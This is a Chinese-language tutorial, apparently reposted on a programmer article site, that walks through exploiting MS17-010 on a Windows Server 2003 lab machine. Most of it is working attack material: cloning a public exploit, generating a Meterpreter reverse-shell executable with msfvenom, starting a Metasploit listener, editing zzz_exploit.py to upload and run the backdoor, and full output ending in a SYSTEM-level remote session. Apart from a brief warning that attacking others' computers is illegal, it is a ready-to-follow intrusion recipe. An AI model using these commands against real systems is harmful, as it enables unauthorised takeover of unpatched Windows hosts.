欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

利用Ms17_010获取Windows2003 Shell

程序员文章站 2022-05-15 21:30:19
...

首先给大家介绍两样东西:

利用Ms17_010获取Windows2003 Shell

利用Ms17_010获取Windows2003 Shell

希望大家要清楚,擅自攻击别人电脑是违法行为!

然后开始今天的主题。。

首先,目标机器是windows2003(x86),IP地址是:10.0.3.146;攻击者的机器是kali,IP地址是:10.0.3.215

然后我们下载一个ms17_010的利用脚本。

root@kali:~/Desktop# git clone https://github.com/worawit/MS17-010/

下载完之后,进入目录:

root@kali:~# cd Desktop/MS17-010/

然后利用checker.py来检查目标是否可以利用这个漏洞,是否有可用管道:

aaa@qq.com:~/Desktop/MS17-010# python checker.py 10.0.3.146
Target OS: Windows Server 2003 R2 3790 Service Pack 2
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (32 bit)
browser: Ok (32 bit)
aaa@qq.com:~/Desktop/MS17-010# 

发现管道名称为netlogon而且状态是OK,说明该漏洞可用。

然后再kali上生成一个后门exe文件:

root@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.3.215  LPORT=4444  -f  exe  -o  /tmp/1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /tmp/1.exe
root@kali:~/Desktop# 

我把这个exe文件放在了/tmp/目录下,这个路径可以随便定,只要你能记住。

然后打开metasploit,使用msf对4444端口进行监听。当然,这个端口可以随便选择,前提是跟前面生成的exe的端口保持一致。具体的命令及其含义看下面:

[i] Database already started
[i] The database appears to be already configured, skipping initialization


                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1796 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

使用exploit/multi/handler 模块

msf > use exploit/multi/handler 

设置攻击载荷windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp

设置攻击者的ip地址及监听端口,这里的ip和端口要跟上面生成exe文件的地方保持一致:

msf exploit(multi/handler) > set lhost 10.0.3.215
lhost => 10.0.3.215
msf exploit(multi/handler) > set lport 4444
lport => 4444

执行监听操作,并将监听放入后台执行:

msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.3.215:4444 
msf exploit(multi/handler) > 

此时查看jobs,发现已经在监听了:

msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.0.3.215:4444

msf exploit(multi/handler) > 

不要关闭msf的控制台,然后回到/MS17-010/文件夹里,修改里面zzz_exploit.py文件的代码:
文件很长,建议用记事本打开,直接搜smb_pwn(conn, arch),找到其位置,然后做如下修改:

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    # 把这两行前面的注释去掉,然后按照自己的路径填写:
    smb_send_file(smbConn, '/tmp/1.exe', 'C', '/1.exe')
    service_exec(conn, r'cmd /c c:\\1.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

保存并退出。
执行利用程序zzz_exploit.py:

aaa@qq.com:~/Desktop/MS17-010# python zzz_exploit.py  10.0.3.146  netlogon
Target OS: Windows Server 2003 R2 3790 Service Pack 2
Groom packets
attempt controlling next transaction on x64
attempt controlling next transaction on x86
success controlling one transaction
Target is x86
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x9711cd48
SESSION: 0xe2be7f10
FLINK: 0x8bd48
InData: 0x8ae28
MID: 0xa
TRANS1: 0x88b50
TRANS2: 0x8ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe2bf4b98
userAndGroupCount: 0x5
userAndGroupsAddr: 0xe2bf4c38
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Opening SVCManager on 10.0.3.146.....
Creating service ynZf.....
Starting service ynZf.....
The NETBIOS connection with the remote host timed out.
Removing service ynZf.....
ServiceExec Error on: 10.0.3.146
nca_s_proto_error
Done

aaa@qq.com:~/Desktop/MS17-010# 

执行成功,此时返回msf的控制台,发现已经收到反弹的shell:

msf exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 10.0.3.146
[*] Meterpreter session 1 opened (10.0.3.215:4444 -> 10.0.3.146:1061) at 2018-08-08 16:53:33 +0800

msf exploit(multi/handler) >

因为是在后台执行的监听,查看sessions,发现已经有了一个会话:

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-7599922A80  10.0.3.215:4444 -> 10.0.3.146:1061 (10.0.3.146)

切换到sessions 1:

msf exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > 
meterpreter > sysinfo
Computer        : TEST-7599922A80
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

最后可用看到msf成功反弹出目标的shell。